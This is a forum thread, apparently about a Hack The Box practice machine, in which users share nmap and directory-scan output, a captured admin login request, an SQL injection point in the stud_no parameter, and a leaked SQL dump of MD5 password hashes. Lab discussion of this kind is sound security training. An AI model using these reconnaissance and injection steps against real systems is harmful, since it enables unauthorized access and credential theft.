Posts: 213 Threads: 0 Joined: N/A PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2e:b2:6e:bb:92:7d:5e:6b:36:93:17:1a:82:09:e4:64 (RSA)
| 256 1f:57:c6:53:fc:2d:8b:51:7d:30:42:02:a4:d6:5f:44 (ECDSA)
|_ 256 d5:a5:36:38:19:fe:0d:67:79:16:e6:da:17:91:eb:ad (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Let's begin your education with us!
|_http-server-header: Apache/2.4.29 (Ubuntu)
8000/tcp open http Apache httpd 2.4.38
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.38 (Debian)
Posts: 46 Threads: 0 Joined: N/A http://exam.seventeen.htb/admin/login.php
/index.php [Size: 17375]
/about.html [Size: 2458]
/about.php [Size: 3382]
/home.php [Size: 455]
/uploads [Size: 315] [--> http://exam.seventeen.htb/uploads/]
/welcome.html [Size: 652]
/assets [Size: 314] [--> http://exam.seventeen.htb/assets/]
/admin [Size: 313] [--> http://exam.seventeen.htb/admin/]
/plugins [Size: 315] [--> http://exam.seventeen.htb/plugins/]
/database [Size: 316] [--> http://exam.seventeen.htb/database/]
/dist [Size: 312] [--> http://exam.seventeen.htb/dist/]
/classes [Size: 315] [--> http://exam.seventeen.htb/classes/]
/404.html [Size: 198]
/config.php [Size: 0]
/inc [Size: 311] [--> http://exam.seventeen.htb/inc/]
/build [Size: 313] [--> http://exam.seventeen.htb/build/]
/exams.php [Size: 1261]
/libs [Size: 312] [--> http://exam.seventeen.htb/libs/]
i think we can upload some file after bypassing admin login which is not enable Posts: 43 Threads: 0 Joined: N/A I find some endpoint in the exam js file
And you should look at :
POST /classes/Login.php?f=login HTTP/1.1
Host: exam.seventeen.htb
Content-Type:application/x-www-form-urlencoded
Accept: */*
Referer: http://exam.seventeen.htb/?p=products&search=a
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ba748c37fe5ea0c4d511c49449dc532a
Connection: close
Content-Length: 33
username=admin&password=test Posts: 46 Threads: 0 Joined: N/A (May 28, 2022, 07:52 PM)iamnoone777 Wrote: I find some endpoint in the exam js file
And you should look at :
POST /classes/Login.php?f=login HTTP/1.1
Host: exam.seventeen.htb
Content-Type:application/x-www-form-urlencoded
Accept: */*
Referer: http://exam.seventeen.htb/?p=products&search=a
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ba748c37fe5ea0c4d511c49449dc532a
Connection: close
Content-Length: 33
username=admin&password=test from where did u get exam.js file Posts: 213 Threads: 0 Joined: N/A There are three folders under http://seventeen.htb/vendor/:
exams
mastermailer
oldmanagement Posts: 43 Threads: 0 Joined: N/A (May 28, 2022, 08:11 PM)Exa Wrote: There are three folders under http://seventeen.htb/vendor/:
exams
mastermailer
oldmanagement Thats sound promising Posts: 213 Threads: 0 Joined: N/A There is an SQL injection vulnerability on http://seventeen.htb/vendor/oldmanagement/ (the stud_no parameter).
Using sqlmap, I found a valid login. Posts: 43 Threads: 0 Joined: N/A (May 28, 2022, 08:18 PM)Exa Wrote: There is an SQL injection vulnerability on http://seventeen.htb/vendor/oldmanagement/ (the stud_no parameter). There is also credentials in http://seventeen.htb/vendor/oldmanagement/db/db_sfms.sql INSERT INTO `student` (`stud_id`, `stud_no`, `firstname`, `lastname`, `gender`, `yr&sec`, `password`) VALUES
(1, 12345, 'John', 'Smith', 'Male', '3A', '827ccb0eea8a706c4c34a16891f84e7b');
INSERT INTO `user` (`user_id`, `firstname`, `lastname`, `username`, `password`, `status`) VALUES
(1, 'Administrator', '', 'admin', '21232f297a57a5a743894a0e4a801fc3', 'administrator'),
(2, 'Claire', 'Temple', 'claire', '827ccb0eea8a706c4c34a16891f84e7b', 'Regular');
Posts: 213 Threads: 0 Joined: N/A (May 28, 2022, 08:25 PM)iamnoone777 Wrote: (May 28, 2022, 08:18 PM)Exa Wrote: There is an SQL injection vulnerability on http://seventeen.htb/vendor/oldmanagement/ (the stud_no parameter).
There is also credentials in http://seventeen.htb/vendor/oldmanagement/db/db_sfms.sql
INSERT INTO `student` (`stud_id`, `stud_no`, `firstname`, `lastname`, `gender`, `yr&sec`, `password`) VALUES
(1, 12345, 'John', 'Smith', 'Male', '3A', '827ccb0eea8a706c4c34a16891f84e7b');
INSERT INTO `user` (`user_id`, `firstname`, `lastname`, `username`, `password`, `status`) VALUES
(1, 'Administrator', '', 'admin', '21232f297a57a5a743894a0e4a801fc3', 'administrator'),
(2, 'Claire', 'Temple', 'claire', '827ccb0eea8a706c4c34a16891f84e7b', 'Regular');
These credentials are different from the ones I read out via sqlmap. So far, I found three tables containing password hashes. One is for the student login. Posts: 43 Threads: 0 Joined: N/A (May 28, 2022, 08:47 PM)Exa Wrote: (May 28, 2022, 08:25 PM)iamnoone777 Wrote: (May 28, 2022, 08:18 PM)Exa Wrote: There is an SQL injection vulnerability on http://seventeen.htb/vendor/oldmanagement/ (the stud_no parameter).
There is also credentials in http://seventeen.htb/vendor/oldmanagement/db/db_sfms.sql
INSERT INTO `student` (`stud_id`, `stud_no`, `firstname`, `lastname`, `gender`, `yr&sec`, `password`) VALUES
(1, 12345, 'John', 'Smith', 'Male', '3A', '827ccb0eea8a706c4c34a16891f84e7b');
INSERT INTO `user` (`user_id`, `firstname`, `lastname`, `username`, `password`, `status`) VALUES
(1, 'Administrator', '', 'admin', '21232f297a57a5a743894a0e4a801fc3', 'administrator'),
(2, 'Claire', 'Temple', 'claire', '827ccb0eea8a706c4c34a16891f84e7b', 'Regular');
These credentials are different from the ones I read out via sqlmap. So far, I found three tables containing password hashes. One is for the student login. My sqlmap is running i will post the result here |
